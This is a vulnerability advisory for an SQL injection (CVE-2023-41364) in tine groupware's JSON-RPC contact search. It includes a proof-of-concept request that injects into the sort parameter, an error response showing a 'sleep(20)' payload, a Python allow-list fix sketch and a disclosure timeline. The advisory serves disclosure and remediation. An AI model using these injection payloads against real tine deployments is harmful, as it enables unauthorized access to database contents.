usd-2023-0002 | tine20 2023.01.14.325 - SQL Injection

Advisory ID: usd-2023-0002
Product: tine groupware
Affected Version: 2023.01.14.325
Vulnerability Type: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Security Risk: Critical
Vendor URL: https://www.tine-groupware.de/
Vendor Status: Fixed
CVE number: CVE-2023-41364
CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2023-41364
Last Update: 2023-08-28

Description

Tine Groupware is open source software that provides a suite of collaborative tools and applications for communication and project management within a business or organization.
It offers features such as email, calendars, task management, contact management, and document management, allowing users to coordinate and share information across teams and departments.

During our research on open source software, we discovered that the sort parameter of the /index.php endpoint (sent in the paging object of JSON-RPC requests) is vulnerable to SQL injection.

Proof of Concept

The request below was used to search contacts in the addressbook.

POST /index.php?transactionid=ae67275bb875279ab755f7e8932334f1f67fbb4c HTTP/1.1
Host: localhost:4000
Content-Length: 376
Cookie: TINE20SESSID=isgch37p9s2ql7rl902b9cjabk; usercredentialcache=eyJpZCI6ImNmZWE3Y2Y4OGE5MjcyM2M5N2JkMWNkOTRmYmRjNzA1ZGY5NzJiODEiLCJrZXkiOiI0MGU1MWE5NTE1ZDIwMWExOTE0MmYxNmMifQ%3D%3D
Connection: close
[...]


{"jsonrpc":"2.0","method":"Addressbook.searchContacts","params":{"filter":[{"condition":"OR","filters":[{"condition":"AND","filters":[],"id":"ext-comp-1229","label":"Contacts"}],"id":"FilterPanel"},{"field":"query","operator":"contains","value":null,"id":"quickFilter"}],"paging":{"sort":"n_fileas'","dir":"ASC","start":0,"limit":50}},"id":33}

When further SQL injection payloads are sent in the sort parameter, the error response discloses the complete SQL query:

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/json
Content-Length: 3853
[...]


{"error":{"code":-32000,"message":"SQLSTATE[42S22]: Column not found: 1054 Unknown column 'n_fileas, sleep(20)' in 'order clause', query was: SELECT `addressbook`.*, (CASE WHEN `addressbook_image`.`contact_id` IS NULL THEN 0 ELSE 1 END) AS `jpegphoto`, `accounts`.`id` AS `account_id` FROM `tine_addressbook` AS `addressbook`\n LEFT JOIN `tine_addressbook_image` AS `addressbook_image` ON `addressbook`.`id` = `addressbook_image`.`contact_id`\n LEFT JOIN `tine_accounts` AS `accounts` ON `addressbook`.`id` = `accounts`.`contact_id` WHERE (`addressbook`.`is_deleted` = 0) AND (`addressbook`.`id` in ('8862248fdce32e46c05a84b12c9e74407f44a23b', 'b70f5321b4339a037e5427ec2504dafa84006d15')) GROUP BY `addressbook`.`id` ORDER BY `n_fileas, sleep(20)` ASC, `account_id` ASC",

Injecting a sleep(20) into the parameter delays the response.

Successful exploitation of this vulnerability allows an unauthorized person to gain access to sensitive data in the database.

Fix

It is recommended to use prepared statements.
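Identifiers in an ORDER BY clause cannot be bound as prepared-statement parameters, so the sort field and direction taken from the paging object have to be checked against a fixed allow-list, while the data values (the contact ids) are bound. The following Python/sqlite3 sketch is an added example, not Tine's own PHP code; the table, the column allow-list and the sample rows are constructed, and the sort payloads shown in this advisory are rejected before any query is built:

```python
import sqlite3

# Constructed allow-list of columns a client may sort contacts by.
ALLOWED_SORT_COLUMNS = {"n_fileas", "n_family", "n_given", "org_name"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


class InvalidPagingError(ValueError):
    """Sort field or direction is not on the allow-list."""


def validate_paging(paging):
    """Return (column, direction) only if both are allow-listed literals.

    The value is compared, never escaped: "n_fileas'" and
    "n_fileas, sleep(20)" both fail the set membership test.
    """
    sort = paging.get("sort", "n_fileas")
    direction = str(paging.get("dir", "ASC")).upper()
    if not isinstance(sort, str) or sort not in ALLOWED_SORT_COLUMNS:
        raise InvalidPagingError("unsupported sort field: %r" % (sort,))
    if direction not in ALLOWED_DIRECTIONS:
        raise InvalidPagingError("unsupported sort direction: %r" % (direction,))
    return sort, direction


def paging_is_valid(paging):
    """Boolean wrapper around validate_paging for callers that only need a verdict."""
    try:
        validate_paging(paging)
        return True
    except InvalidPagingError:
        return False


def search_contacts(conn, contact_ids, paging):
    """Run the contact query: identifiers from the allow-list, every value bound."""
    column, direction = validate_paging(paging)
    if not contact_ids:
        return []  # "IN ()" is a syntax error; nothing to select anyway
    placeholders = ", ".join("?" for _ in contact_ids)
    sql = ('SELECT id, n_fileas FROM tine_addressbook WHERE is_deleted = 0 '
           'AND id IN (%s) ORDER BY "%s" %s, id ASC LIMIT ? OFFSET ?'
           % (placeholders, column, direction))
    params = (*contact_ids, int(paging.get("limit", 50)), int(paging.get("start", 0)))
    return conn.execute(sql, params).fetchall()


def demo_db():
    """Constructed in-memory table standing in for tine_addressbook."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tine_addressbook (id TEXT PRIMARY KEY, n_fileas TEXT, is_deleted INTEGER)")
    conn.executemany("INSERT INTO tine_addressbook VALUES (?, ?, ?)",
                     [("id-1", "Muster, Max", 0), ("id-2", "Doe, Jane", 0), ("id-3", "Gone, Guy", 1)])
    return conn
```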

References

Timeline

  • 2023-01-24: First contact request via mail
  • 2023-04-21: Asked vendor for a status update
  • 2023-05-04: Vendor does not see an exploitable vulnerability
  • 2023-05-15: Shared further payloads and proofs with the vendor
  • 2023-05-17: Vendor denies exploitable vulnerability
  • 2023-05-23: Vulnerability is fixed, according to the vendor

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.